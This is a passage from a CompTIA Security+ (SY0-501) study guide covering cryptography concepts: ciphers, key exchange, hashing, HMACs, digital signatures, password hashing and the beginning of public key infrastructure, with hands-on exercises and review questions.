the start of a message. On the other hand, the IV needs to be unique, since repeating it can damage, or even
destroy, security. For this reason, an IV is often used as an example cryptographic nonce, an arbitrary number
only used once. For some modes, it's important that the IV be random, pseudorandom, or at least
unpredictable, while in other modes it can be procedurally generated as long as it's never reused.
Block size also matters when it comes to semantic security: if you send enough blocks using a single key,
you'll risk reuse of IVs, opening your data to attack. Like keys themselves, this relationship is exponential
rather than linear: while you can safely encrypt up to 2 32 64-bit blocks (32 GB) with one key, you can send 264
128-bit blocks (256 Exabytes). This means that 64-bit block ciphers can no longer be considered entirely safe
for particularly large data transfers or modern hard drive encryption, even if the keys and IVs themselves are
strong.

Note: Semantic security isn't a problem limited to block ciphers. In fact, if anything stream ciphers can
be harder to secure against weak IVs or other attacks designed to uncover keys based on underlying data
patterns. This is part of why streaming encryption is commonly performed by using a block cipher in a
stream-friendly mode.

CompTIA Security+ Exam SY0-501 127


Chapter 3: Cryptography / Module A: Cryptography concepts

Symmetric algorithms
There are a large number of symmetric encryption algorithms in common use, though many are outdated or
only used in a narrow field of applications. Often a given application or protocol will support a number of
different algorithms; if so, you'll need to choose a suitable balance of security, performance, and compatibility
for your needs. Like with all cryptography, remember that a theoretically strong but unproven method can
sometimes be a bigger risk than a flawed standard with weaknesses you can plan around.

Exam Objective: CompTIA SY0-501 6.2.1

DES Data Encryption Standard is a block cipher developed in the 1970s for hardware-based
encryption and decryption devices, and for a long time was a US government standard. It uses a
56-bit key, which was strong at the time but is much too weak for real security today. It also uses
64-bit blocks, which limits its security for large volumes of data.
3DES Triple DES was developed in the 1990s, to make a stronger standard based on DES. It simply
runs DES three times on the same 64-bit block: by using three different keys, it gets up to 168
bits. For technical reasons, that's as effective as a single 112-bit key. Unfortunately, it has some
additional cryptographic weaknesses, so NIST classifies the effective strength of 168-bit 3DES
as only 80 bits. This is good enough for most purposes, and in fact until 2016 was considered
acceptable for payment card processing, but it's no longer considered strong encryption.
Additionally, it's computationally rather expensive for its effective strength if you're not using
hardware acceleration.
AES Advanced Encryption Standard, also known as Rijndael, was adopted by NIST in 2001 after
being chosen over 14 other competitors. The original Rijndael was a block cipher with a variable
block length up to 256-bits, but the AES version specifies only 128-bit blocks. It can use 128-,
192-, or 256-bit keys, it's fast in both hardware and software, and no practical attacks have been
published against the cipher itself. This means AES can be considered the gold standard of
current encryption, though like any cipher a given implementation might have vulnerabilities
that undermine the encryption strength. The US government specifies AES-256 for Top Secret
communications, but 128 is good enough for most purposes.
Blowfish Also developed in the 1990s, Blowfish was the first strong cipher placed in the public domain,
so it became rather popular. It supports variable key sizes up to 448 bits, so can make very
effective encryption, but due to some flaws and its 64-bit block size it's no longer as popular as it
once was.
Twofish An enhanced successor to Blowfish, Twofish was another AES finalist. While it lost the
competition to Rijndael, it can be considered comparable to AES in security: it uses 128-bit
blocks with a key size of 128-, 192-, or 256-bits, and no known significant cryptographic
weaknesses.
Serpent Another former AES finalist, Serpent has the same block and key properties as Rijndael and
Twofish. It's arguably more secure than either, but placed second due to performance and
complexity issues.

128 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module A: Cryptography concepts

Rivest Cipher / A family of ciphers developed by the cryptographer Ron Rivest, these are identified as the
Ron's Code numbered RC series. The most widely used is RC4, a stream cipher designed in 1987. RC4
has been enduringly popular since it's very quick to encode or decode even in software.
Unfortunately, it's an older design with a lot of vulnerabilities both in the cipher itself and
its common implementations; this means it's largely been replaced by block ciphers
operating in stream modes. By contrast, RC6 is a block cipher and AES finalist, but never
achieved such widespread popularity.
CAST A family of block ciphers that's been used in a variety of popular products. CAST-128 uses
64-bit blocks and keys ranging from 40- to 128-bits. CAST-256 is a former AES finalist
with 128-bit blocks and keys ranging from 128- to 256-bits.

Exercise: Symmetric encryption


You can perform this activity in any browser. It doesn't need to be in a VM. In this exercise you'll encrypt
some text using the AES standard.

Note: This exercise uses a web-based encryption tool, which may have changed or gone offline since the
time of writing.

Do This How & Why

1. Open It's a simple web tool that uses the AES encryption algorithm.
http://aesencryption.net/
in your browser.

2. Encode a message.

a) In the first text field, type a It can be a favorite quote, random words, or whatever you like,
message. so long as it's easy to remember.

b) In the key field, type Just like a password, if you wanted strong security you'd
1234567890. choose a sufficiently long, random key.

CompTIA Security+ Exam SY0-501 129


Chapter 3: Cryptography / Module A: Cryptography concepts

Do This How & Why

c) Click Encrypt. You'll use the default 128-bit encryption. The ciphertext
appears below, in base64 as well as encrypted. Base64 doesn't
add security, it just allows binary data to be encoded as ASCII
text.

3. Decode the ciphertext with the same


key.

a) Select and copy the ciphertext. Be sure to get it all.

b) Paste the ciphertext into an empty You'll want to compare it later.


Notepad file.

c) Paste the ciphertext into the top Replace the original quote, don't add to it.
field on the web page.

d) Click Decrypt. The original text is restored.

4. Encrypt the original text with a


slightly different key.

a) Copy the original text to the top You want to make sure it's identical to the first time.
window again.

b) Change the key to 123456789a

c) Click Encrypt. Just a small change in the key makes a very different
ciphertext. A very small change in the plaintext would have
done the same.

5. Close your browser and Notepad.

One message encoded with two slightly different keys.

130 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module A: Cryptography concepts

Key life cycles


Even if the key and algorithm both are strong, it's not a good idea to keep encrypting data with the same key
forever. One reason is the same you shouldn't keep a password forever: the longer it's in use, the longer an
attacker has to crack or otherwise compromise it, and the longer an eavesdropper can make use of a cracked
or stolen key. Another is because once you send enough data with a single key, gradually you'll end up reusing
IVs and opening your data to attack.

Exam Objective: CompTIA SY0-501 6.1.8, 6.1.17, 6.1.18, 6.1.26


Strong cryptography uses temporary keys for the actual encryption of data. Often they're used only for the
duration of a single communication session, which is why symmetric cryptography is also called session key
cryptography. Especially in asymmetric cryptography, keys used for a short term are often called ephemeral
keys, as contrasted with static keys used for longer periods.
Generating session keys is a particular challenge for symmetric transport encryption. Not only does the
session key need to be random or pseudorandom, it also needs to be known to both parties. One way to do this
is to have a long-term static key, such as one based on a user password or unique device identifier, and
combine it with some sort of nonce to create a session key. As long as both parties can synchronize their
session key creation, they have temporary secret keys, and as long as the process uses the right sort of
algorithm a session key can't be used to guess the static key. The static key can then be safely stored without
being exposed to anything other than the ephemeral key generator.
Generating ephemeral keys from static ones doesn't actually solve the fundamental problem of key exchange
though. Symmetric transport encryption relies on a single secret key shared both parties, however long it's
used for, and that means somehow the key has to be communicated between them without an eavesdropper
being able to discover it. There are two main ways to exchange keys, and both can be difficult.

In-band key The key is exchanged over the same communications channel that's going to be
exchange encrypted. This poses its own problem: if the channel isn't encrypted yet, how do you
keep the key secret? The nature of symmetric keys makes secure in-band exchange very
difficult. You could encrypt the key itself with another key, but that key itself needs to be
exchanged too.
Out-of-band key The key is exchanged over a different, more secure channel than the one to be encrypted.
exchange For example, you could communicate a password to someone verbally, or send a smart
card via mail or courier. Out-of-band key exchange is secure if and only if the other
channel is, and it's often less convenient, especially if keys need changed often.

Ephemeral keys in themselves also don't solve another problem: even if you can't generate a static key from
an ephemeral key, what happens if your static key is compromised? If it can be used to re-generate ephemeral
keys used in past sessions, an attacker who's intercepted and saved those messages can now decrypt your
whole communications history. A secure communications protocol is said to have perfect forward secrecy if a
static key is of no use to recover ephemeral keys used in past sessions. Perfect forward secrecy is very
desirable and helps to make cryptography much more resilient against particular violations of confidentiality,
but it's another feature that's hard to achieve with symmetric encryption alone.

CompTIA Security+ Exam SY0-501 131


Chapter 3: Cryptography / Module A: Cryptography concepts

Asymmetric encryption
Asymmetric encryption, also known as public key cryptography, was first demonstrated in the 1970s and
since then has become a vital part of public security. Like symmetric encryption, it starts with a single large
random number, but it uses specialized mathematical equations to turn it into two separate, but tightly
interrelated, keys. Anything encrypted with one key can only be decrypted with the other. The reason why it's
called public key cryptography is because one key is kept private, and the other can be shared with the public.

Exam Objective: CompTIA SY0-501 6.1.3

Anyone who has your public key can use it to encrypt a message only you can read, at least so long as you
keep your private key. Encrypting with your private key means anyone with the public key can read it, so if
you want to send someone else a confidential message, they'll have to send you their public key. Messages
encrypted with a private key aren't secret, but they're still very useful; if you receive a message that can be
decrypted by someone's public key, it proves the message came from that person, or at least someone using
that private key. This means public key cryptography is not only useful for confidentiality, but authentication
and non-repudiation as well.
Compared to symmetric encryption, asymmetric encryption needs much longer keys for the same effective
strength, and the relationship isn't exactly linear. Using the most popular asymmetric algorithms, a 1024-bit
key has about the same work factor as an 80-bit symmetric key, 2048 bits is equivalent to 112-bit symmetric,
and 3072 bits is equivalent to 128-bit symmetric. Related to this, asymmetric algorithms are also much
slower, enough that they're not generally used for long messages.
Asymmetric encryption is perfectly suited for some tasks that symmetric encryption is poor at, including key
exchange. Alice and Bob can exchange their public keys in cleartext without worrying who sees, then either
can use the other's public key to send secure messages that only their partner's private key can decrypt. It
doesn't even matter if the asymmetric algorithm is too slow to encrypt a lot of data: if Alice wants to start a
bulk transport to Bob, she first encrypts an AES session key with Bob's public key. Once he decrypts it, she
can send the larger message encrypted in AES.
In addition to encryption and key exchange, public key cryptography is a key component in digital signatures
used for authentication and non-repudiation. As its name suggests it's also a central component of the public
key infrastructure used to manage security across entire networks, though PKI relies on a number of other
technologies as well.

Asymmetric algorithms
Not only are there a large number of asymmetric systems in use, but they're used for a number of different
tasks. In general, popular algorithms fall into a few categories or families, and they're generally based on
some kind of mathematical problem that's not difficult to solve in theory, but in practice can take nearly
forever unless you already know the answer.

Exam Objective: CompTIA SY0-501 6.1.6, 6.2.3.1, 6.2.3.2, 6.2.3.3, 6.2.3.4

132 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module A: Cryptography concepts

RSA Created at MIT and named after its inventors: Ron Rivest, Adi Shamir, and Leonard
Adleman. RSA uses a private key made from two large prime numbers along with an
additional value; the public key can be easily calculated if you know the private key, but
doing the reverse is unfeasibly difficult. This sort of one-way problem is called integer
factorization. RSA keys can be as large as 4096 bits, but they're much weaker than a
symmetric key of the same size. In practice, 1024-bit keys are considered either a
minimum or newly obsolete on modern systems; anything lower is far too weak, and most
security experts recommend 2048-bit keys or more.
RSA is computationally very expensive, especially with longer keys, but since it's most
commonly used for key exchange and creating digital signatures where performance isn't
considered a big problem it's been widely implemented across many protocols and
cryptosystems. For example, RSA is the default algorithm used in the SSL/TLS certificates
used by secure websites and many other encrypted protocols.
DSA Digital Signature Algorithm was created by a former NSA employee in 1991 and soon
adopted as a NIST standard. It uses a different one-way problem called a discrete
logarithm. It is similar in overall strength to RSA at the same key length, but different in
performance. DSA allows faster key generation and decryption, but RSA is faster for data
encryption and signature verification. Which is better depends on use case, but RSA is
more popular and current DSA standards require 1024-bit keys which are no longer
considered secure.
ECC Elliptic Curve Cryptography uses algorithms based on the difficulty of calculating certain
properties of elliptical curves. The underlying math is difficult to explain and not very
important, but its main advantage is strong security with much shorter keys than other
asymmetric algorithms; for example, a 256-bit ECC key is as strong as a 3072-bit RSA
key, even if it's still only as strong as a 128-bit AES key. ECC is also much faster than
RSA, so it's valuable for mobile and embedded devices with limited processing power.
Diffie-Hellman Created by and named for Whitfield Diffie and Martin Hellman in 1976, DH was the first
key exchange openly published public-key cryptography system (the first, created by a few years
(DH) previously by the British government, was classified until many years later). As the name
suggests, this method is used primarily for key exchanges rather than encrypting other
data. The key exchange can either be based on a static key (DH), or an ephemeral key
(DHE) which additionally provides perfect forward secrecy. Since it's more a method than
a particular algorithm, DH implementations can be based on a variety of underlying
mathematical problems; since it's so old, it served as the basis for many subsequent
algorithms. The original DH and DHE are based on one called the discrete logarithm
problem. ECDHE is a version of DHE based on ECC. Even RSA can be described as a DH
implementation based on prime factorization, though it's commonly used somewhat
differently.
Note: Since Diffie-Hellman is a collection of different algorithms, DH
standards define groups which are a combination of algorithm and key
size. For example, DH Group 2 is a 1024-bit modulus key, DH Group 14
is a 2048-bit modulus, and DH Group 20 is a 384-bit ECC key. The
strength of a given group depends on both the key size and algorithm, so
Group 20 is still stronger than Group 14.

Asymmetric algorithms have their own weaknesses too: even if you don't have to worry about your public key
falling into the wrong hands, it's much harder to tell if a public key you receive from someone else really
belongs to who you think it does. Without additional authentication this means public key exchanges are very
vulnerable to man-in-the-middle attacks.

CompTIA Security+ Exam SY0-501 133


Chapter 3: Cryptography / Module A: Cryptography concepts

Quantum computing is another threat to public key cryptography. It's theorized that some quantum computing
advances could provide practical solutions to some of the intractable problems used in key generation,
rendering entire cryptosystems obsolete regardless of key size.
On the other hand, a type of quantum cryptography called quantum key distribution (QKD) is a developing
technology that could be used to enhance security. QKD exploits the fact that measuring a quantum system
disturbs it, and changes its value. The precise details are hard to explain if you're not a physicist, but the end
result is that you can almost perfectly detect eavesdropping, and use a key only if you're certain no third party
has viewed or copied it.

Exercise: Asymmetric encryption


You can perform this activity in any browser. It doesn't need to be in a VM. In this exercise you'll use an
online tool to generate random RSA key pairs.

Note: This exercise uses a web-based key generation tool, which may have changed or gone offline
since the time of writing.

Do This How & Why

1. In your browser, navigate to The page automatically generates public and private keys
http://travistidwell.com/j when it loads.
sencrypt/demo/

2. Click Generate New Keys. To create a new key pair.

3. Click the key size list. You can create RSA keys ranging from 512bits to 4096 bits.
Longer keys are more secure, but slower to create and use.

4. In the bottom section, click The sample plaintext is turned into ciphertext.
Encrypt/Decrypt.

5. Click Encrypt/Decrypt again. The original plaintext is restored.

6. Close your browser.

134 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module A: Cryptography concepts

Cryptographic hashing
One of the most important tools in verifying data integrity is hashing. Hashing is a little like public key
encryption in that it uses a one-way function to turn data into another form, and in that even a single changed
bit in the plaintext will produce a very different result. At the same time, hashing has some very important
differences from encryption. First, no matter how long the original string of data is, the resulting hash is
always the same size. Second, there is no decryption key: the hash isn't intended to be turned back into its
original form at all, and in fact it's often impossible to do so. Finally, since the hash doesn't reveal the
plaintext a given hashing algorithm doesn't use a unique key to encrypt either. In fact, it's critical that anyone,
anywhere, hashing a given string of plaintext will produce the same result.

Exam Objective: CompTIA SY0-501 6.1.4, 6.1.12


For an example, the simplest hash values are called check digits, and are just one digit long. Imagine adding
each digit of a long number together, then each digit of that number, and so on, until you only have one
resulting digit: that's a very simple hash (not a very useful one, but we'll get to that.). A longer hash value is
similarly often called a checksum, or a message digest.

Check digits also demonstrate another feature of hashes: it's possible to have hash collisions, where multiple
different inputs produce the same hash. It's all the more likely when the hash is short and thus has limited
possible values. Collisions can be bad, so most hashing algorithms are designed to prevent them both by
producing longer hash values and by choosing mathematical processes unlikely to produce accidental
collisions. Even then, if you're hashing data records much larger than the hash itself, collisions are always
possible.
If you're using a hash for cryptography, it's not just important that collisions be hard to generate by accident;
they must also be hard to generate on purpose. For example, imagine that you downloaded an application
installer and use a hash to verify its integrity against the publisher's original result. A cryptographically weak
checksum, such as the cyclic redundancy checks (CRCs) used by many network and storage technologies,
might be good at detecting if the file was accidentally corrupted during download, but still allow an intelligent
attacker to insert a Trojan horse then make other inconsequential changes that would "cancel out" and produce
the same hash. This and other collision attacks are a real threat to security, so choosing strong cryptographic
hash algorithms is as important as choosing strong encryption.

CompTIA Security+ Exam SY0-501 135


Chapter 3: Cryptography / Module A: Cryptography concepts

Hash applications
Hashing is a versatile tool that's used in many aspects of security, and for that matter in data storage and
transmission in general. Often it's combined with other cryptographic functions to provide more complete
security. When security isn't a primary concern, non-cryptographic hashes are often used for faster
performance. Some of the more common uses for hashes include:

Exam Objective: CompTIA SY0-501 6.1.24

Data integrity Since any change in data will change its hash, you can verify the integrity of any data
transmission by comparing a hash made by the sender to one made by the recipient.
Similarly, you can hash files when you store them, then verify the data hasn't been
altered later by making a new hash for comparison. One important limitation of
hashes used for data integrity is that unless the hash itself is stored or transmitted
securely, an attacker who alters a file could also replace its hash.
Data identification If you need to uniquely identify a file or other data element, you can create hashes for
each file and store them in a database or a data structure called a hash table. Hash
tables are valuable for searching and organizing large amounts of data, for example to
recognize duplicate files even if they're stored in different folders or under different
names. Popular applications for identity hashes include source code management
systems, file sharing networks, and image databases.
Key generation Since the output of a cryptographic hash is pseudorandom, it can be used anywhere
pseudorandom data of a fixed length is desired, for example in key generation. You
can generate a new key by hashing an existing key, arbitrary data, or some
combination of the two. Hashing is particularly valuable for creating cryptographic
keys from passwords created by humans; since these passwords are often shorter and
less random than modern keys it's a good idea to add a key stretching algorithm that
makes brute force decryption more difficult.
Password storage A plaintext password database is a security risk, since an attacker who accesses the
system can easily steal all user passwords at once. For this reason, many password
databases only store the hash, not the password itself. This way, when a user logging
in enters a password it can be hashed and compared to the hash in the database, but
an attacker who steals a copy of the database itself still won't know the passwords
themselves and can't impersonate a user. Hashing passwords isn't perfect security: if
the database is all simple password hashes, any two users with the same password
will have the same hash, and an attacker can use a pre-generated hash table or
rainbow table with the hash values for many common passwords. To prevent this,
passwords are hashed along with value called a salt. Like an IV, the salt is typically
random so that it would require a totally unique rainbow table, but stored
unencrypted so it can be re-combined with the password when the user logs in.
Another strategy called key stretching uses one of several mathematical methods to
transform a weak key in a way that makes it much more work to attack it by brute
force.

136 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module A: Cryptography concepts

Hash-based authentication
An important thing to remember is that a hash itself only protects message integrity, and even then only
against accidental modification. However, by combining hashes and other cryptographic tools you can
achieve complete security. Confidentiality is pretty obvious—you can encrypt the hash, the data, or both—but
the right combination of techniques hashes allow you to provide authenticity and non-repudiation even of
unencrypted plaintext.

Exam Objective: CompTIA SY0-501 6.1.9, 6.1.28.8, 6.2.4.3


For a straightforward example, imagine that Alice is negotiating a business deal with Bob and sends him a
formal offer. The terms of the offer aren't especially private, so it's safe to send as an unencrypted email
message. On the other hand, Bob wants to be certain both that the offer really came from Alice, and that the
offer he received is exactly as Alice wrote it.

CompTIA Security+ Exam SY0-501 137


Chapter 3: Cryptography / Module A: Cryptography concepts

Alice could simply send the message and append its hash; on receiving it,
Hash value alone
Bob can hash the message and verify it against what Alice sent. If the
message was corrupted in transit, even by a single bit, Bob could detect it.
But imagine that Mallory wants to intercept the message and change some
numbers so she can get Alice to seemingly offer a different deal without
knowing it. If that's the only change she makes, the hashes will be different
and Bob will detect it; on the other hand, if Mallory is smart and generates a
new hash, Bob has no way of noticing anything is wrong. Even if Alice
thought of this and put the hash in a second separate message, that just
makes Mallory's attack a little more work.
If Alice and Bob have a shared secret key, such as a password or the key
Keyed-hash message
from any symmetric encryption algorithm, she can combine it with the
authentication code (HMAC)
hashing process to create an HMAC, then send it as the hash to accompany
the message. Since Bob knows the key, he can perform the same process on
the message he receives, and verify the hash. On the other hand, since
Mallory doesn't know the key, even if she alters the message she can't create
a new valid HMAC. In other words, the HMAC provides verification of both
the message's integrity, and its authenticity. Note that this doesn't perfectly
protect Bob's business interests: if Alice changes her mind later she could
claim Bob wrote the message, and generated the HMAC, himself. In some
protocols, an HMAC is simply called a MAC, or Message Integrity Code
(MIC).
Using asymmetrical cryptography, Alice can create a digital signature by first
Digital signature
creating a hash of the data, then encrypting it with her private key. She then
sends the encrypted hash along with the plaintext message. Bob, Mallory, or
anyone else can both read the message and use Alice's public key to decrypt
the hash; however, without Alice's private key no one can duplicate the
signature. Since Bob can prove Alice sent the message even if she later
denies it, the digital signature provides non-repudiation as well as
authenticity and integrity.

Remember, in all of these cases the security still depends on the confidentiality and security of the keys in
use. If Mallory got hold of the shared secret she could forge an HMAC, and if she stole Alice's private key she
could forge a digital signature. Mallory could also insert herself into the public key exchange, convincing Bob
that her own public key was in fact Alice's. That way, she could forge "Alice's" digital signature with her own
key. Even if Alice and Bob could uncover that particular trick through later investigation, the attack could
both waste their time and damage their business relationship.

Hash algorithms
There are several cryptographic hash functions in common use, and even more you might find in particular
applications. Like with encryption, older algorithms tend to be less secure due to shorter hashes and known
flaws. Barring major flaws, a hash is about as strong as a symmetric key of half its length, so a 256-bit hash
can be as hard to crack as 128-bit encryption.

Exam Objective: CompTIA SY0-501 4.2.13, 6.2.4, 6.2.5


While you're unlikely to see encryption keys actually written out, very often hashes are displayed as
hexadecimal strings so that they can be stored in text files or entered in fields. Since small changes in
plaintext can greatly change the hash value, even the human eye will suffice as a preliminary comparison of
two integrity hashes.

138 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module A: Cryptography concepts

Message Trust requires integrity. trust requires integrity.


MD5 506395a77f8aeeb546364cd93ba44986 7d72eca45e11dbae00f0c1288a
1070b7

SHA-1 0e933f08a0ec349d9a5eaf320008df2e ca0c7153bd2da303db65f45f96


cffaf313 0afcab5287e226

SHA-256 3953735b5f3e702690f057f74e7eb418 ff897f8d2c731f599cef769f92


631ee564bbcb16be738d22fec23e68c2 5cbf27f68d1202f9e670aeb26d
2a8bd3c8e820

RIPEMD-160 695d98844a0998f499fede0e75471ebc 0c0703c4d77008d341b88b0d6c


09d9ef02 542570bc17ea99

MD5 Message Digest 5 is a successor to the earlier MD4 hash., and produces a 128-bit value,
usually written as a 32 digit hexadecimal number. It's been used in a lot of cryptographic
applications over the years, but it's too short to be very strong today. In addition it's not
very collision-resistant, and has some other cryptographic flaws. MD4 and MD5 should
both be considered obsolete for security purposes, but they're still found in legacy use or
for local password storage.
SHA-1 Part of the Secure Hash Algorithm series standardized by NIST, SHA-1 produces a 160-bit
value and is written as 40 hexadecimal digits. It was designed to correct weaknesses of the
earlier SHA-0 algorithm. SHA-1 is very widely used in modern protocols as a replacement
for MD5, but due to cryptographic flaws it should no longer be considered secured against
attackers with large computing resources. In 2017 Google demonstrated an attack against
SHA-1 by publishing two PDF files with identical SHA-1 hashes.
SHA-2 The SHA-2 family was chosen by NIST to succeed SHA-1, but it has significant
mathematical differences to make it more secure. SHA-2 includes six different functions
producing hashes between 224 and 512 bits. SHA-256 and SHA-512 are the most popular.
It wasn't adopted very quickly, partly since it wasn't supported by older operating systems,
but it's now becoming the new standard in modern applications.
SHA-3 Finalized by NIST in 2015 after an open competition, SHA-3 is based on the Keccak
algorithm, and produces hashes between 224 and 512 bits. It's not actually any stronger
than SHA-2, and isn't intended to replace it; instead it was chosen as a similarly strong but
mathematically very different backup option in case someone discovers a successful SHA-
2 attack.
RIPEMD RACE Integrity Primitives Evaluation Message Digest was developed by the Computer
Security and Industrial Cryptography (CSIC) research group in Belgium. It's based on
MD4, but with security improvements and additional functions to produce hashes between
128 and 320 bits. The most popular is RIPEMD-160, which is similar to SHA-1 in
performance but has fewer known flaws.

CompTIA Security+ Exam SY0-501 139


Chapter 3: Cryptography / Module A: Cryptography concepts

Password storage algorithms tend to use hashing, but aren't strictly hashing algorithms alone.

NTLM NT LAN Manager was first developed for storing password hashes in Windows NT 4.0, and is
included on every Windows version since. NTLM is designed both for network logon and for
storing local user passwords. NTLMv1 is based on the original (and very insecure) Lan
Manager hash. While it improved security at the time by using an MD4 hash, MD4 is now very
outdated. NTLMv2 improved the logon process by adding HMAC-MD5 hashes, but didn't
change the password storage element. Modern Windows versions use a Kerberos-based network
logon by default, but NTLMv2 is still supported, and local passwords are still stored as
relatively insecure MD4 hashes.
bcrypt A specialized hash based on the Blowfish key setup process, bcrypt is designed for password
storage but also useful for key derivation and key stretching. bcrypt combines passwords with a
128-bit salt to create a 184-bit hash. bcrypt is considered an old and well-proven technology;
one of its particular strengths is that it's designed to be very slow, and you can adjust its
parameters to make it even slower. This might sound bad, but for password hashes it can be an
advantage: storing or testing a single password still doesn't take long enough for a user to
notice, but trying to crack a password takes so many attempts that the work factor can be
immense no matter what attack method is used.
PBKDF2 Designed by RSA security and published as a IETF standard, Password-Based Key Derivation
Function 2 is another popular key derivation function used for the same functions as bcrypt. It's
easily customized, supporting a number of underlying hashes, ciphers, and HMACs to produce
keys and salted hashes of different lengths. Despite its flexibility PBKDF2 isn't generally
considered as strong as bcrypt, especially against modern GPU-based cracking attempts; a
number of alternatives have been designed, but they're still considered new and less proven.

Exercise: Creating file hashes


In this exercise, you'll use a hashing tool to demonstrate that slight data changes also alter the hash.
Do This How & Why

1. In the Windows 7 VM, create a text You'll create a file to test hashing tools on.
file.

a) Open Notepad.

b) Type any text you like.

c) Save the file to your desktop as Leave Notepad open.


HashCreation.txt.

2. Install HashCalc.

a) In the Tools folder on your desktop, In the hashcalc subfolder.


click the HashCalc setup file.

b) Accept all defaults during setup. HashCalc opens once it's installed. It allows you to calculate
hashes using a wide variety of popular algorithms.

3. Use HashCalc to create hashes for


your new text file.

140 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module A: Cryptography concepts

Do This How & Why

a) In HashCalc, click the Data Format You can calculate hashes for files, text strings, or hex strings.
list. You'll calculate it for a file.

b) Press Esc, To close the list.

c) Next to the Data field, click ... and


browse to your desktop folder.

d) Select HashCreation.txt and The full file path appears in the Data field.
click Open.

e) Starting with MD5, check all the If this was a large file creating all the hashes would take a
hash boxes. while, but since it's so small you might as well compare them.

f) Click Calculate. Each hash is displayed. You'll have to expand the window to
view the longer algorithms like SHA512, but it's easy to see
that each algorithm produces a very different hash from the
same input.

4. Edit HashCreation.txt again. Don't close HashCalc.

a) In Notepad, make a slight change to Even just adding or changing one character will do.
the file.

b) Save the file.

5. Create hashes of the edited file. You'll open a second instance of HashCalc so you can view
both sets of hashes at once.

a) On the Desktop, double-click A second instance of the program opens.


HashCalc.

b) In the Data field, add Click … and browse to it.


HashCreation.txt.

c) Check all the hash boxes. From MD5 to the bottom.

d) Click Calculate.

6. Move the two windows side-by-side to The whole hash values don't need to be visible. Even with a
compare results. small text change, all of the hashes should be very different
even at a quick glance.

7. Close all open windows.

CompTIA Security+ Exam SY0-501 141


Chapter 3: Cryptography / Module A: Cryptography concepts

Compared hashes at the end of the exercise

Your results won't look exactly the same, but the differences should be visible.

Assessment: Cryptography concepts


1. Which type of cryptography is most commonly used for key exchange? Choose the best response.
 Asymmetric encryption
 Hashing
 One-Time Pad
 Symmetric encryption

2. What type of cryptography is usually used for password storage? Choose the best response.
 Asymmetric encryption
 Hashing
 One-Time Pad
 Symmetric encryption

142 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module A: Cryptography concepts

3. Order the following encryption ciphers from weakest to strongest.

1. 3DES
2. AES
3. Blowfish
4. DES
4, 1, 3, 2
4. Which of the following was originally designed as a stream cipher? Choose the best response.
 AES
 Blowfish
 RC4
 Twofish

5. What asymmetric algorithm uses complex new mathematical approaches to create relatively short but
very secure and high-performance keys? Choose the best response.
 DH
 ECC
 RIPEMD
 RSA

6. According to NIST, what is the effective strength of a 168-bit 3DES key? Choose the best response.
 56-bit
 80-bit
 112-bit
 168-bit

7. What process gives integrity, authenticity, and non-repudiation? Choose the best response.
 Diffie-Hellmann key exchange
 Digital signature
 Hashing
 HMAC

8. You've received an assortment of files along with accompanying hashes to guarantee integrity. Some of
the hash values are 256-bit and some are 512-bit. Assuming they all use the same basic algorithm, what
might it be? Choose the best response.
 MD5
 RIPEMD
 SHA-1
 SHA-2

CompTIA Security+ Exam SY0-501 143


Chapter 3: Cryptography / Module B: Public key infrastructure

Module B: Public key infrastructure


As you might have noticed by now, even over a public network strong encryption can keep a message safe
from eavesdroppers, but setting up the secure connection is a challenge. Public key cryptography solves the
biggest technical challenge of securely exchanging secret session keys, but it doesn't protect you from
securely exchanging keys with the wrong person. Preventing man-in-the-middle attacks requires that public
key exchanges have some sort of authentication process.
You will learn:
 About digital certificates
 About certificate authorities
 About the certificate life cycle

Digital certificates
To illustrate the basic problem of key exchange, imagine that Alice and Bob want to set up a secure
communications session. If they already have each other's public keys, it's easy for Alice to send Bob a
session key encrypted with his public key. If they don't have each other's public keys, they can exchange those
as plaintext since they're not private. But how does Alice know the public key she's received is really Bob's,
and vice versa? Not only could Mallory impersonate Bob to get secrets from Alice, or impersonate Alice to
get secrets from Bob, she could do both at once, then view and alter the whole session without either knowing
a thing. Even if Alice receives a message with "Bob's" digital signature, it would really just be signed with
Mallory's forged key.

Exam Objective: CompTIA SY0-501 6.4.1.6, 6.4.1.7, 6.4.1.8


When you have any doubts about a public key's ownership, you need a way to authenticate it. Passwords
really aren't ideal for this. If Alice sent Bob a password he would know it was her, unless she had sent it to
Mallory by mistake, and Mallory repeated it to Bob. Alternatively they could verify what each others' public
keys are over a separate secure channel the first time, but that channel has to be set up somehow too. Ideally,
Alice and Bob need something that uniquely ties their public keys to themselves.
A solution to this problem is a digital certificate, also known as a public key certificate. In addition to the key
itself and its owner's identity, the certificate includes other information such as a hash of the key itself,
starting and ending dates for its validity, and the intended purposes of the key. Most critically, a certificate
includes one or more digital signatures attesting to the authenticity of the key. In this case, if Bob's public key
is in a certificate signed by Alice's good friend John, whose key she has already, she can now verify that Bob
is really who he claims to be.

Note: It's easy to confuse digital certificates with digital signatures; after all, they're closely related not
only in name but in uses and underlying technologies. The important thing to remember is that a digital
signature is meant to prove the authenticity of a particular message or document, while a digital
certificate is used to prove the identity of a person or system. To put it another way, a digital certificate
is a public key that has been digitally signed.

Trust models
Certificates are only as good as the trust relationship they can establish between the party presenting a
certificate and the one evaluating it. There are multiple trust models for key signing, depending on whose
signature it bears.

Exam Objective: CompTIA SY0-501 6.4.1.1, 6.4.1.2, 6.4.2.4, 6.4.2.6, 6.4.3.4

144 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module B: Public key infrastructure

Self-signed
The certificate is signed only with its owner's private key. This works just fine for key exchange and
encryption, but it doesn't give authentication on its own: the issuer is saying "Trust me, I am who I say I am."
You can implement a simple authentication infrastructure by first verifying the ownership of someone's
certificate by another means, and then making sure it hasn't changed later, but this can be a lot of trouble.
Public key infrastructure (PKI)
The certificate is registered and signed by a central and respected certificate authority (CA) that can vouch for
its authenticity. A large organization might manage its own private CA for internal communications;
otherwise, a number of third-party public CAs offer certificate services to the public. If a certificate is
compromised, the CA can revoke it and issue a new one. The X.509 certificate standard used by many secure
protocols supports both PKI and self-signed keys.PKI itself encompasses multiple trust models.
• In the hierarchical or tree model, all trust relationships in a single infrastructure go back to a single
